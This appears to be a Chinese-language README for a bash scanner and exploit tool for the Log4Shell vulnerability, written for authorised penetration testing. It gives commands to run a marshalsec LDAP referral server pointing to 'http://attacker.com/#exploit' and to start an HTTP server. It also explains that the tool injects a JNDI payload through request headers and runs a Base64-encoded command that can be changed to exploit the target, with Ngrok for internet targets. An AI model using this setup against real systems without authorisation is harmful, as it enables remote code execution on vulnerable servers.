Log4Shell-Scanner-Exploit
用于远程识别和/或利用Log4shell漏洞的bash脚本。
该工具使用LDAP payload以及X-Api-Version、User-Agent和X-Forwarded-For头部进行多项测试。
务必在获得被审计服务/应用程序所有者的授权后使用此脚本。
依赖项:
- 从Github创建预配置的LDAP服务器:https://github.com/mbechler/marshalsec
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
-
启用HTTP服务器
python3 -m http.server 8080
-
安装Java
#sudo apt install default-jre
-
安装Curl
#sudo apt-get install curl
使用示例:
输入以下参数:
- 要扫描的URL列表
- LDAP服务器IP地址
- LDAP服务器端口
- HTTP服务器IP地址
- HTTP服务器端口
扫描内网应用示例:
- ./Log4Shell_Scanner.sh <URL字典> <LDAP服务器IP> <LDAP服务器端口> <HTTP服务器IP> <HTTP服务器端口>

扫描互联网应用示例:
- ./Log4Shell_Scanner.sh <URL字典> <LDAP服务器IP> <LDAP服务器端口> <HTTP服务器IP> <HTTP服务器端口>

说明:
- 所使用的payload会向被识别为易受攻击的机器发送一条“ifconfig”命令,该payload已用Base64编码,可在渗透测试审计中修改以执行利用阶段。
- 若要在互联网服务中使用该工具,可启用Ngrok服务,将其转发到LDAP服务器的本地端口。
- 务必在获得被审计服务/应用程序所有者的授权后使用此脚本。